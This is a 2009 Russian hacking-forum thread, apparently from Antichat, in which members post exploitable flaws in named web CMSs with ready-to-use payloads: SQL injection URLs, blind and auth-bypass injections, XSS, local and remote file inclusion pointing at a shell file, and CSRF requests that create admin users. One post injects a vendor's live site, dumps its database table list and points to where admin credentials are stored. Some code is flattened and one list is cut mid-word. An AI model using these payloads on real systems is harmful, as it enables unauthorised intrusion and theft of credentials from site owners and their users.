Энциклопедия уязвимых скриптов

Discussion in 'Веб-уязвимости' started by DIAgen, 1 Jun 2006.

  1. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    BLOX CMS

    BLOX CMS
    Сайт: http://blox.ru/


    SQL-injection

    Уязвимый код:
    editPageParams.php
    PHP:
    . . .
     if (empty(
    $_SESSION['page']))
         
    $aa $_GET['page'];
     else 
    $aa $_SESSION['page'];

     
    $U LD($aa);
    . . .
    getPageParams.php
    PHP:
     function LD($NA)
     {
     . . .
        if (!empty(
    $NA))
        {
           
    $result mysql_query"SELECT * FROM ".C."pages WHERE id=$NA LIMIT 1");
     . . .
     }
    Эксплуатация:
     
    2 people like this.
  2. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    Так же у вышеуказанного скрипта есть уязвимость позволяющая попасть в админку без авторизации!
    В скрипте authenticate.php
    PHP:
    <?php
     
    include BLOXDIR."/inc/redirect.php"RO(); function RO() { $O $_POST['login']; $BM $_POST['passwrd']; $TJ false; if (!empty($O) && !empty($BM)) { $A "SELECT permit FROM ".C."users WHERE login = '$O' AND passwrd = '$BM'"; if ($result mysql_query($A)) { if ($row mysql_fetch_assoc($result)) { if ('admin' == $O$TJ true; elseif (!empty($row['permit'])) $TJ true; } } } if (!empty($TJ)) { $_SESSION['login'] = $O; if (isset($_POST['savePasswrd'])) { if (!empty($_POST['savePasswrd'])) { $V = array ($_POST['login'], $_POST['passwrd']); $NP base64_encode(serialize($V)); if (setcookie('blox'"$NP"time() + 432000)); } else if (setcookie('blox'""time() + 10)); } } } ?>
    В самом начале скпипта мы видим инклуд некого редерикт.пхп:
    Code:
    include BLOXDIR."/inc/redirect.php
    Смотрим его код:
    PHP:
    <?php
     KQ
    (); function KQ() { $BG "?"; if (SID$BG .= SIDheader("Location: $BG"); } ?>
    Вроде ничего особенного, обычный редерикт, но после header("Location: $BG"); не указан die() or exit() , таким образом нас хоть и пересылает по адресу редерикта, но скрипт всё равно выполняется!
    Скачав прогу инеткряк или её аналог мы можем послать http запрос и попасть в админку!
     
    2 people like this.
  3. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    BIGACE
    Download:http://downloads.sourceforge.net/bigace/bigace_2.5_RC2.zip

    POST:
    Code:
    <script type="text/javascript">
    function changeURL(){ var URL = document.getElementById("site"); document.forms[0].action= URL.value; }
    </script>
    <form method="POST" id="target" action="">
    Test site:<br>
    <input type="text" size="80" id="site" value="http://site.com/public/index.php?cmd=application&id=-1_tsearch_len">
    <br><br>JavaScript to execute:<br>
    <textarea name="language" id="JScode"  rows="5" cols="60">>"><script>alert(0);</script></textarea>
    <input type="submit" OnClick="changeURL()">
    </form>
     
    1 person likes this.
  4. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    GENERAL-CMS

    Как они заявляют:
    Code:
    General-CMS - одна из ведущих систем управления сайтом в своей отрасли!
    Увы уязвимый код показать не смогу, так как двиг платный, а платить не хочется :D

    Возьмём офф сайт:

    http://www.cms-soft.ru/

    И офигеем, за что они хотят от 800р до 3000р =//

    SQL INJECTION:
    1)
    Code:
    http://www.cms-soft.ru/index.php?level1&levelid=18'+union+select+1,2,version()--+/index.php
    2)
    Code:
    http://cms-soft.ru/cms/7'+union+select+1,2,version()--+/index.php
    Итак, что я вытянул:

    на сайте крутится 4 БД:

    Code:
    information_schema
    shop-imperial
    shop-imperial_affiliate	
    shop-imperial_post
    из information_schema я вытащил названия таблиц, их там предостаточно:

    Code:
    cmssystemaddress
    cmssystemadmin	
    cmssystemadrscom	
    cmssystemcategories
    cmssystemcategoriesdop	
    cmssystemcatshops
    cmssystemmetashops
    cmssystemonline
    cmssystemorder
    cmssystemordergoods
    cmssystempages	
    cmssystempagesdop	
    cmssystempassport	
    cmssystemshops	
    cmssystemusers	
    demoadmin	
    democategories
    democategoriesdop
    demometa	
    demometadop	
    demopages	
    demopagesdop	
    flashcat_backlinks
    flashcat_categories
    flashcat_conf
    flashcat_sites
    generalavtoaddress
    generalavtoadmin
    generalavtoadrscom
    generalavtocategories
    generalavtocategoriesdop
    generalavtocatshops	
    generalavtometashops	
    generalavtoonline	
    generalavtoorder	
    generalavtoordergoods
    generalavtopages
    generalavtopagesdop
    generalavtopassport
    generalavtoshops	
    generalavtousers	
    generalboardruaddress	
    generalboardruadmin	
    generalboardruadrscom	
    generalboardruannouncements
    generalboardrucatboard
    generalboardrucategories
    generalboardrucategoriesdop
    generalboardrucatshops	
    generalboardrumetaboard	
    generalboardrumetashops
    generalboardruonline
    generalboardruorder	
    generalboardruordergoods	
    generalboardrupages	
    generalboardrupagesdop	
    generalboardrupassport	
    generalboardrushops	
    generalboardruusers	
    generalcultureruaddress	
    generalcultureruadmin	
    generalcultureruadrscom
    generalcultureruannouncements
    generalculturerucatboard	
    generalculturerucategories	
    generalculturerucategoriesdop
    generalculturerucatshops
    generalculturerumetaboard
    generalculturerumetashops
    generalcultureruonline
    generalcultureruorder
    generalcultureruordergoods
    generalculturerupages	
    generalculturerupagesdop	
    generalculturerupassport	
    generalculturerushops	
    generalcultureruusers	
    generalestatesruaddress
    generalestatesruadmin
    generalestatesruadrscom
    generalestatesruannouncements
    generalestatesrucatboard	
    generalestatesrucategories	
    generalestatesrucategoriesdop
    generalestatesrucatshops
    generalestatesrumetaboard
    generalestatesrumetashops
    generalestatesruonline	
    generalestatesruorder	
    generalestatesruordergoods
    generalestatesrupages
    generalestatesrupagesdop
    generalestatesrupassport
    generalestatesrushops	
    generalestatesruusers	
    generalhouseaddress	
    generalhouseadmin	
    generalhouseadrscom	
    generalhouseannouncements
    generalhousecatboard	
    generalhousecategories	
    generalhousecategoriesdop
    generalhousecatshops
    generalhousemetaboard	
    generalhousemetashops	
    generalhouseonline	
    generalhouseorder	
    generalhouseordergoods	
    generalhousepages	
    generalhousepagesdop	
    generalhousepassport	
    generalhouseshops	
    generalhouseusers	
    generalpropertyruaddress
    generalpropertyruadmin	
    generalpropertyruadrscom	
    generalpropertyruannouncements	
    generalpropertyrucatboard	
    generalpropertyrucategories	
    generalpropertyrucategoriesdop	
    generalpropertyrucatshops	
    generalpropertyrumetaboard	
    generalpropertyrumetashops	
    generalpropertyruonline
    generalpropertyruorder
    generalpropertyruordergoods	
    generalpropertyrupages	
    generalpropertyrupagesdop
    generalpropertyrupassport
    generalpropertyrushops	
    generalpropertyruusers
    generalrealruaddress
    generalrealruadmin
    generalrealruadrscom	
    generalrealruannouncements	
    generalrealrucatboard	
    generalrealrucategories	
    generalrealrucategoriesdop
    generalrealrucatshops
    generalrealrumetaboard
    generalrealrumetashops	
    generalrealruonline	
    generalrealruorder	
    generalrealruordergoods	
    generalrealrupages	
    generalrealrupagesdop	
    generalrealrupassport	
    generalrealrushops
    generalrealruusers
    generalscienceaddress
    generalscienceadmin	
    generalscienceadrscom	
    generalscienceannouncements
    generalsciencecatboard
    generalsciencecategories
    generalsciencecategoriesdop
    generalsciencecatshops
    generalsciencemetaboard	
    generalsciencemetashops	
    generalscienceonline	
    generalscienceorder	
    generalscienceordergoods
    generalsciencepages
    generalsciencepagesdop
    generalsciencepassport
    generalscienceshops	
    generalscienceusers	
    generaltourismaddress
    generaltourismadmin
    generaltourismadrscom
    generaltourismannouncements
    generaltourismcatboard	
    generaltourismcategories
    generaltourismcategoriesdop
    generaltourismcatshops
    generaltourismmetaboard
    generaltourismmetashops
    generaltourismonline	
    generaltourismorder	
    generaltourismordergoods
    generaltourismpages
    generaltourismpagesdop
    generaltourismpassport
    generaltourismshops	
    generaltourismusers	
    importaddress	
    importadmin	
    importadrscom	
    importcategories
    importcategoriesdop
    importcatshops
    importmetashops
    importonline
    importorder
    importordergoods
    importpages
    importpagesdop
    importpassport
    importshops	
    importusers
    kirilladdress
    kirilladmin
    kirilladrscom
    kirillannouncements
    kirillcatboard
    kirillcategories
    kirillcategoriesdop
    kirillcatshops
    kirillmetaboard
    kirillmetashops	
    kirillonline	
    kirillorder	
    kirillordergoods
    kirillpages
    kirillpagesdop	
    kirillpassport
    kirillshops
    kirillusers	
    pinaevaddress	
    pinaevadmin	
    pinaevadrscom	
    pinaevannouncements
    pinaevcatboard
    pinaevcategories
    pinaevcategoriesdop
    pinaevcatshops
    pinaevmetaboard	
    pinaevmetashops	
    pinaevonline	
    pinaevorder	
    pinaevordergoods
    pinaevpages
    pinaevpagesdop
    pinaevpassport
    pinaevshops	
    pinaevusers	
    shopimperial2address
    shopimperial2admin
    shopimperial2adrscom
    shopimperial2categories
    shopimperial2categoriesdop
    shopimperial2catshops	
    shopimperial2metashops	
    shopimperial2online	
    shopimperial2order	
    shopimperial2ordergoods	
    shopimperial2pages	
    shopimperial2pagesdop	
    shopimperial2passport	
    shopimperial2shops	
    shopimperial2users	
    shopimperialadmin	
    shopimperialcategories
    shopimperialcategoriesdop
    shopimperialmeta	
    shopimperialmetadop	
    shopimperialpages	
    shopimperialpagesdop	
    trastsoftaddress	
    trastsoftadmin	
    trastsoftadrscom
    trastsoftcategories	
    trastsoftcategoriesdop	
    trastsoftcatshops	
    trastsoftmetashops	
    trastsoftonline
    shopimperialmetadop
    shopimperialpages
    shopimperialpagesdop
    trastsoftaddress
    trastsoftadmin
    trastsoftadrscom
    trastsoftcategories
    trastsoftcategoriesdop
    trastsoftcatshops
    trastsoftmetashops
    trastsoftonline
    trastsoftorder
    trastsoftordergoods
    trastsoftpages
    trastsoftpagesdop
    trastsoftpassport
    trastsoftshops
    trastsoftusers
    traststroyaddress
    traststroyadmin
    traststroyadrscom
    traststroycategories
    traststroycategoriesdop
    traststroycatshops
    traststroymetashops
    traststroyonline
    traststroyorder
    traststroyordergoods
    traststroypages
    traststroypagesdop
    traststroypassport
    traststroyshops
    traststroyusers
    vall1address
    vall1admin
    vall1adrscom
    vall1categories
    vall1categoriesdop
    vall1catshops
    vall1metashops
    vall1online
    vall1order
    vall1ordergoods
    vall1pages
    vall1pagesdop
    vall1passport
    vall1shops
    vall1users
    vall3address
    vall3admin
    vall3adrscom
    vall3categories
    vall3categoriesdop
    vall3catshops
    vall3metashops
    vall3online
    vall3order
    vall3ordergoods
    vall3pages
    vall3pagesdop
    vall3passport
    vall3shops
    vall3users
    vogeanorgruaddress
    vogeanorgruadmin
    vogeanorgruadrscom
    vogeanorgruannouncements
    vogeanorgrucatboard
    vogeanorgrucatcompany
    vogeanorgrucategories
    vogeanorgrucategoriesdop
    vogeanorgrucatshops
    vogeanorgrufirms
    vogeanorgrumetaboard
    vogeanorgrumetacompany
    vogeanorgrumetashops
    vogeanorgruonline
    vogeanorgrupages
    vogeanorgrupagesdop
    vogeanorgrupassport
    vogeanorgrushops
    vogeanorgruusers
    vogeanruaddress
    vogeanruadmin
    vogeanruadrscom
    vogeanrucategories
    vogeanrucategoriesdop
    vogeanrucatshops
    vogeanrumeta
    vogeanrumetadop
    vogeanrumetashops
    vogeanruonline
    vogeanruorder
    vogeanruordergoods
    vogeanrupages
    vogeanrupagesdop
    vogeanrupassport
    vogeanrushops
    vogeanruusers
    generaladdress
    generaladmin
    generaladrscom
    generalannouncements
    generalcatboard
    generalcategories
    generalcategoriesdop
    generalcatshops
    generalmetaboard
    generalmetashops
    generalonline
    generalorder
    generalordergoods
    generalpages
    generalpagesdop
    generalpassport
    generalshops
    generalusers
    vogeanorgadmin
    vogeanorgcategories
    vogeanorgcategoriesdop
    vogeanorgmeta
    vogeanorgmetadop
    vogeanorgpages
    vogeanorgpagesdop
    antipolitikaaddress
    antipolitikaadmin
    antipolitikaadrscom
    antipolitikaannouncements
    antipolitikacatboard
    antipolitikacategories
    antipolitikacategoriesdop
    antipolitikacatshops
    antipolitikametaboard
    antipolitikametashops
    antipolitikaonline
    antipolitikaorder
    antipolitikaordergoods
    antipolitikapages
    antipolitikapagesdop
    antipolitikapassport
    antipolitikashops
    antipolitikausers
    articlesnetaddress
    articlesnetadmin
    articlesnetadrscom
    articlesnetannouncements
    articlesnetcatboard
    articlesnetcategories
    articlesnetcategoriesdop
    articlesnetcatshops
    articlesnetmetaboard
    articlesnetmetashops
    articlesnetonline
    articlesnetorder
    articlesnetordergoods
    articlesnetpages
    articlesnetpagesdop
    articlesnetpassport
    articlesnetshops
    articlesnetusers
    catalogmusicaddress
    catalogmusicadmin
    catalogmusicadrscom
    catalogmusicannouncements
    catalogmusiccatboard	
    catalogmusiccategories	
    catalogmusiccategoriesdop
    catalogmusiccatshops
    catalogmusicmetaboard
    catalogmusicmetashops
    catalogmusiconline	
    catalogmusicorder	
    catalogmusicordergoods
    catalogmusicpages
    catalogmusicpagesdop
    catalogmusicpassport
    catalogmusicshops	
    catalogmusicusers	
    demosaddress	
    demosadmin	
    demosadrscom	
    demosannouncements
    demoscatboard
    demoscategories	
    demoscategoriesdop	
    demoscatshops	
    demosmetaboard	
    demosmetashops	
    demosonline	
    demosorder	
    demosordergoods	
    demospages	
    demospagesdop	
    demospassport	
    demosshops	
    de
    
    аки хранятся в таблице cmssystemadmin.
    Колонки:
    Code:
    id,login,password,name
    Удачи!
     
    1 person likes this.
  5. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    MagicSite CMS XSS

    В строке поиска <script>alert('Antichat')</script>
    Code:
    http://www.magicsite.ru/search.php?sword=%3Cscript%3Ealert%28%27Antichat%27%29%3C%2Fscript%3E&x=0&y=0
    Одним запросом и XSS и раскрытие путей и скуль инжект не далеке ;)
    На сервере у них magic_quotes=ON, так как даные слешируются!
    Code:
    http://www.magicsite.ru/search.php?sword=1'
    Вы искали: "1\'"
    Не далеко и скуль инжект!
    Админка: http://www.magicsite.ru/admin/

    Но вход разршон с браузера Microsoft Internet Explorer версии 5.5 и выше!

    P.S.: Её продают за 24 505,00 р. =//
     
    #125 bug1z, 15 May 2009
    Last edited: 15 May 2009
    1 person likes this.
  6. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    skillz CMS XSS
    В поле Поиск по сайту:
    "><script>alert(111)</script>
    Code:
    http://www.skillz.ru/index.php?search=%22%3E%3Cscript%3Ealert%28111%29%3C%2Fscript%3E&m=search
     
    1 person likes this.
  7. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    SOS Webpages

    SOS Webpages
    Сайт: http://www.soswebpages.com/
    Табличка с логинами\хешами админов: hw_admin
    Дефолтовый префикс: sos_


    SQL-injection

    Уязвимый код:
    photo.php
    PHP:
     . . .
     if (isset(
    $_GET['photo_id'])) {
        
      
    $photo_id mysql_real_escape_string($_GET['photo_id']);
      
    $sql "SELECT * FROM " $dbprefix "photos WHERE photo_id=$photo_id";
      
    $result=mysql_query($sql);  
     . . .  
    Классный код )) Зачем спрашивается юзать mysql_real_escape_string() и при этом не обрамлять параметр кавычками в запросе :D
    Аналогично с переменной event_id в этом же скрипте

    PHP:
     . . .
    elseif (isset(
    $_GET['event_id'])) {
      
      
    $event_id mysql_real_escape_string($_GET['event_id']); 
        . . .
        
    $sql "SELECT * FROM " $dbprefix "events WHERE event_id=$event_id";
      
    $result=mysql_query($sql);
     . . .  
    Эксплуатация:
    Пример:
     
    2 people like this.
  8. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    Уязвимости Pinpin Content 0.1 Beta

    Уязвимости Pinpin Content 0.1 Beta
    download: http://garbure.org/garbure/pinpin_content/pinpin-0.1-beta.tar.gz

    RFI(требования: register_globals=on)
    /pinpin/pinpin.php
    Уязвимость существует из-за отсутствия предварительного определения переменной $level_path, при непосредственном обращении к скрипту.
    уязвимый код:
    PHP:
    include "$level_path/pinpin/pinpin.conf.php";
    эксплуатирование:
    Code:
    /pinpin/pinpin.php?level_path=http://site.com/shell.txt?

    (с) Iceangel_
     
    1 person likes this.
  9. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    Cifshanghai Script

    Download: http://www.cifshanghai.com/
    Vuln File: new.php
    Exploit:
    Code:
    http://localhost/[path]/new.php?id=[SQL]
    POC:
     
  10. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Etomite CMS Blind Sql injection, чтения локальных файлов
    Производитель:http://www.etomite.org/
    Продукт:Etomite CMS
    Версия:1.1
    Чтения локальных файлов(постом или при registr_globals on гетом и magic_quotes_gpc off):
    PHP:
    http://www.hsc.org/manager/actions/static/document_data.static.action.php?id=../../../../../includes/config.inc.php%00
    Blind Sql injection
    Иньекция в Referer, вернее в path(manager/includes/visitor_logging.inc.php(101)):
    PHP:
    $referer urldecode($_SERVER['HTTP_REFERER']);
    if(empty(
    $referer)) {
      
    $referer "Unknown";
    } else {
      
    $pieces parse_url($referer);
        
    $referer $pieces['scheme']."://".$pieces['host'].$pieces['path'];
    }

    ...........................

    $sql "REPLACE INTO $tbl(id, data) VALUES('".$ref."', '".$referer."')";//206

    пример реферера для blind:
    PHP:
    http://asdasdasdads.com/%27 or 1=IF(ASCII(SUBSTRING((SELECT username FROM etomite.etomite_manager_users where id = 1),1,1))>96,0,(select 1 union select 5)))--+

    необходимо знать префикс и имя базы данных(без нее выпадаем в ошибку)
     
    1 person likes this.
  11. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    CuteNews
    CSRF:

    Code:
    http://localhost/cutenews/index.php
    
    POST /cutenews/index.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://localhost/cutenews/index.php?mod=editusers&action=list
    Cookie: lastusername=underwater; username=underwater; md5_password=xxx;
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 128
    regusername=underwater&regpassword=_123456&regnickname=underwater&regemail=underwater%40gmail.com&reglevel=1&action=adduser&mod=editusers

    Code:
    http://localhost/cutenews/index.php?regusername=underwater&regpassword=_123456&regnickname=underwater&regemail=underwater%40gmail.com&reglevel=1&action=adduser&mod=editusers
    Про шелл уже не стал писать:=\
     
    1 person likes this.
  12. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    Уязвимости Simple Ban
    download: http://boedesign.com/downloads/simpleban_v1.5.zip

    Blind SQL-injection(требования: magic_quotes=off)
    updatenote.php

    уязвимый код:
    PHP:
    $id $_GET["fieldname"];
    $note $_GET["content"];
    mysql_query("UPDATE notes SET note='$note' WHERE id='$id'") or die ("I could not insert"); 

    эксплуатирование:
    Code:
    updatenote.php?content=9999'+or+if(ascii(substring((select+concat_ws(0x3a,user,pass)+from+admin),1,1))>1,BENCHMARK(2000000,md5(current_date)),2)--+
    в случае истинности условия получаем небольшую задержку




    bypass(требования: magic_quotes=off)
    login.php
    уязвимый код:
    PHP:
    $user $_POST['user'];
    $pass $_POST['pass'];

    if(
    $_POST['login']){
        
    // QUERY ADMIN DATABASE
        
    $getlogin "SELECT * FROM admin WHERE user='$user' and pass='$pass'";
        
    $getlogin2 mysql_query($getlogin);

    эксплуатирование:
    логинимся с именем:
    ' or 1=1--



    (с) Iceangel_
     
    #132 Iceangel_, 3 Jun 2009
    Last edited: 3 Jun 2009
    1 person likes this.
  13. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    LFI(требования: register_globals=on)
    /forums/profile.php

    Переменая $phpEx, судя по коду, должна была определятся в extension.inc, но разработчик по невнимательности, не включил в файл в дистрибутив, вследствии имеем возможность определить переменную и получить локальный инклуд
    уязвимый код:
    PHP:
    define('IN_PHPBB'true);
    $phpbb_root_path './';
    include(
    $phpbb_root_path 'extension.inc');
    include(
    $phpbb_root_path 'common.'.$phpEx);
    эксплуатирование:
    Code:
    /forums/profile.php?phpEx=../../../../../../../../../../../etc/passwd

    (с) Iceangel_
     
    2 people like this.
  14. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    Уязвимости Potato News 1.0.2

    Уязвимости Potato News 1.0.2
    download: http://potato-news.googlecode.com/files/potatonews-1.0.2.zip

    LFI
    (требования: register_globals=on)

    /timeago.php
    уязвимый код:
    PHP:
    if (file_exists("data/comments/$nid.ip.php")) {
    include(
    "data/comments/$nid.ip.php");
    эксплуатирование:
    Code:
    /timeago.php?nid=../../../../../../../../../../../../etc/passwd

    (с) Iceangel_
     
    1 person likes this.
  15. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Программа: WebEyes Guest Book 3

    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «mesajid» сценарием yorum.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    Эксплоит:

    http://[website]/[script]/yorum.asp?mesajid=11+union+select+0+from+msysobjects
     
  16. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    поисковик TSEP <=0.942.02
    http://milw0rm.com/exploits/9057
     
  17. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    Обзор уязвимостей sourcebans

    Sourcebans - комплекс банов на игровых серверах (если сервер есть в списке и ркон к нему подходит (не буду объяснять что такое ркон))

    Офф сайт: sourcebans.net

    Статистика уязвимостей

    Всего уязвимостей найденно: 5
    XSS: 3
    MySql Error: 1
    Плохая проверка данных: 1

    1. ACTIVE XSS

    Уязвимая страница: sait.ru/index.php?p=submit
    Проблемный файл: pages/page.submit.php

    Уязвимые поля: Comments/Комменты, Players IP/Айпи игроков, STEAM_ID

    Описание:
    Подставляем в уязв. поля алерт, и он срабатывает у админа если он зайдет в bans (управление банами)
    Минус что если по почте придет отчет что бан добавлен то будут детали бана в письме и так пропалят xss

    Автор уязвимости: .wolmer
    Версии: во всех версиях до 1.4.5 (включительно 1.4.5)


    2.ACTIVE XSS 2

    Уязвимая страница: sait.ru/index.php
    Проблемный файл: Точно не известно

    Уязвимые поля: Intro Title

    Описание:
    В случае если вы потеряли взломанный аккаунт то его можно контролировать если вы заранее подставили скрипт на сниффер в поле "Intro Title" но опять таки админ может пропалить :)

    Автор уязвимости: .wolmer
    Версии: во всех версиях до 1.4.2 (включительно 1.4.2)(скорее всего и в 1.4.3 так как прикрывают токо паблик уязвимости(сам не тестил в версии 1.4.3/1.4.4/1.4.5))(указанные баги найденны за 3 дня и в паблике не обнаруживались)


    3.ACTIVE XSS 3

    Уязвимая страница: sait.ru/index.php?p=admin&c=mods
    Проблемный файл: pages/admin.edit.mod.php

    Уязвимые поля: Mod Name, Mod Folder

    Описание:
    Не достаточная обработка входных данных, в связи с этим возможна ACTIVE XSS в выводе модов а так же в выводе серверов в админке! Можно использовать как бекдор для в случае если аккаунт потерян

    Автор уязвимости: .wolmer
    Версии: во всех версиях до 1.4.5 (включительно 1.4.5)


    4. MySql Error

    Уязвимая страница: sait.ru/index.php?p=submit
    Проблемный файл: pages/page.submit.php

    Уязвимые параметры: <select id="server" name="server"> в выборе серверов, сам параметр value

    Описание:
    Описания нету

    Автор уязвимости: .wolmer
    Версии: во всех версиях до 1.4.5 (включительно 1.4.5)


    5. Не достаточная проверка данных

    Уязвимая страница: sait.ru/index.php
    Проблемный файл: includes/sb-callback.php

    Уязвимые параметры: отсуствуют

    Описание:
    Не достаточная обработка при смене емаила
    Ничего не проверяется, следовательно можно получить полный доступ сменив емаил админа (поменяв ID админа в параметре поста xajaxargs[])
    Для того чтобы сменить емаил удаленно просто надо поснифать http пакеты на локальном хосте (когда меняем емаил) и отправить их на указанный адрес в интернете (где расположен двиг. sourcebans)

    Автор уязвимости: Mr. Anonymous
    Версии: во всех версиях до 1.4.2 (включительно 1.4.2)


    На этом у меня все, в следующем обзоре уязв. sourcebans попробую рассказать про заливку шелла и про многие другие уязвимости этого движка
     
    #137 wolmer, 1 Jul 2009
    Last edited: 14 Nov 2009
  18. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    phpBMS v0.96
    половина скриптов в дирах

    Code:
    phpBMS v0.96
    phpbms.org
    
    eLwaux(c)2009, uasc.org.ua
    http://phpbms.org/trial/
    
    
    ## ## ##
    SQL Inj
    -----------------------------------------------------------------------------------------------
    	$querystatement="SELECT
    if(discounts.type+0=1,concat(discounts.value,\"%\"),discounts.value)
                      AS value FROM discounts WHERE id=".$_GET["id"];
    	$queryresult = $db->query($querystatement);
    -----------------------------------------------------------------------------------------------
    PoC: /modules/bms/invoices_discount_ajax.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database())
    
    
    
    ## ## ##
    SQL Inj
    \dbgraphic.php
    -----------------------------------------------------------------------------------------------
            $querystatement="SELECT ".$_GET["f"].",".$_GET["mf"]." FROM
    ".$_GET["t"]." WHERE id=".$_GET["r"];
    	$queryresult=$db->query($querystatement);
    -----------------------------------------------------------------------------------------------
    PoC: \dbgraphic.php?f=concat_ws(id,login,password)&mf=1&t=users&r=1
    
    
    ## ## ##
    SQL Inj
    -----------------------------------------------------------------------------------------------
    	if(isset($_GET["cmd"])){
    		switch($_GET["cmd"]){
    			case "show":
    				showSearch($_GET["tid"],$_GET["base"],$db);
    			break;
    		}//end switch
    -----------------------------------------------------------------------------------------------
    PoC:
    	/advancedsearch.php?cmd=show&tid=-1+union+select+login+from+users&base=2
    	/advancedsearch.php?cmd=show&tid=-1+union+select+password+from+users&base=2
    
    
    ## ## ##
    pXSS
    -----------------------------------------------------------------------------------------------
            <form name="form1" method="post" action="<?php echo
    $_SERVER["PHP_SELF"]?>">
    -----------------------------------------------------------------------------------------------
    PoC:
         \index.php/"><script>alert(/xss/);</script><div id="
         \modules\base\myaccount.php/"><script>alert(/xss/);</script><div id="
         \phpbms\modules\base\modules_view.php"><script>alert(/xss/);</script><div
    id="
         \phpbms\modules\base\tabledefs_options.php\">{XSS}
         \phpbms\modules\base\adminsettings.php\">{XSS}
    
    
    ## ## ##
    Path Disclosure
         /footer.php
         /header.php
         /advancedsearch.php?cmd=show&
         /choicelist.php
     
    3 people like this.
  19. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    GenCMS
    Code:
    GenCMS
    http://gencms.berlios.de/
    
    eLwaux(c)2009
    
    LFI
    /show.php
    ----------------------------------------------------------------------------------------------------
    18:   $param = $_GET['p'];
    19:   if(empty($param)) $param = 'news';
    20:          //get right page 
    21:       //$page = $param.'.php';
    22:	
    23:    //static or dynamic
    24:    if(GC_FULLSTATIC)
    25:    {
    26:        $page = $param.'.htm';
    27:        staticpage($page);
    28:    }
    29:    else
    30:    {
    31:        $page = GC_IPATH.'_base/sites/'.$param.'.php';
    32:        dynamicpage($page); 
    33:    }
    ----------------------------------------------------------------------------------------------------
    PoC: /show.php?p=../../{FILE.PHP}%00
    
    
    LFI
    /admin/pages/SiteNew.php
    ----------------------------------------------------------------------------------------------------
    14:   if(!empty($_GET['step'])) $Step = $_GET['step'];
    23:   if ($Step == "2")
    24:   {
    25:        // allgemeine settings
    26:        //include blocks from template config
    27:        include_once(GC_IPATH.'templates/'.$_POST['Template'].'/config.php');
    28:        $TPLBlocks = explode(';',$TemplateSettings);
    29:   }
    ----------------------------------------------------------------------------------------------------
    PoC: /admin/pages/SiteNew.php?step=2& ( POST: Template=../{FILE.PHP}%00 )
     
    3 people like this.
  20. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    SqliteAdmin



    CSRF

    Code:
    http://site/sqlitemanager/main.php?dbsel=1
    POST /sqlitemanager/main.php?dbsel=1 HTTP/1.1
    Host: 190.161.4.211
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3,
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://site/sqlitemanager/main.php?dbsel=1&function=IF&action=modify
    Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxx
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 332
